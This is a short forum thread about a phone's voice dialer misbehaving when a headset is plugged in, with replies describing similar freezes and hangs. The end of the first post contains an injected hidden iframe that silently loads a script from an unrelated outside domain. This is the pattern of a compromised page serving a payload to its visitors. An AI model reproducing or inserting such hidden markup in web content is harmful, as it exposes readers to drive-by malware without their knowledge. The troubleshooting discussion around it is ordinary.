+ Reply to Thread
Results 1 to 3 of 3
  1. #1
    Registered User
    Join Date
    02-19-2003
    Posts
    6

    Voice Dialer Problems

    I tried to search and was not too successful. I was an early adopter about 2 months ago, purchasing the phone from getconnected and activating it on Verizon. I am having problems with the voice dialer program. Basically my problem is this:

    Whenever I plug my headset in, the phone goes haywire. It just stays in voice dialer mode without me pressing anythign and keeps calling the last dialed number.

    I have tried everything. Turning auto answer and wake up on and off. Retraining, deleting the whole voice dialer address book, but nothing helps. Whenever the headset is plugged in, the phone puts itself into voice dialer mode.

    Any suggestions? COuld it be the headset? I have a Jabra headset that I purchased from the Verizon Wireless Store. It does not have any send or end buttons on the headset, it is just strictly a headset.

    Any advice or ideas would be greatly appreciated because at this point, I cannot even use the headset when the phone is in standby because it keeps making calls.

    I looked in the manual, but the section on the voice dialer is not exactly too enlightening.

    Thanks all.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    03-10-2003
    Posts
    176
    I'm having similar problems, with or without headphones. I posted yesterday about it but no one responded. Here's my post from yesterday.

    Sometimes certain numbers get hung up when I voice dial. It will recognize the command, say it's calling, then it just hangs there in calling,... it reads calling but there is no ringing. They only to end the call is to shut the phone down, then start it up again. Now this same number can be dialed manually, from the address book and with speed dial fine. This only happens on voice dial...

  3. #3
    Registered User
    Join Date
    08-24-2001
    Posts
    281
    CDNRI -- I've had my 7135 for nearly a week and had one "something - like" happen to me, I do loads of traveling and like using noise reducing head phones so I purchased a special adaptor from Fry's Electronics, it is a reducer taking the 3.5 mm (normal mini plug fo rheadphoes) to the 2.5 mm (required for the phone). WHen I pluged the adaptor into the phone, it froze, hard forze, I done a warm reboot and everything was fine and I havn't tried it since. Maybe you have a short or something in your hands free kit... I kinda figure that is what happend with this adaptor.

    hope this helps.

    --terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts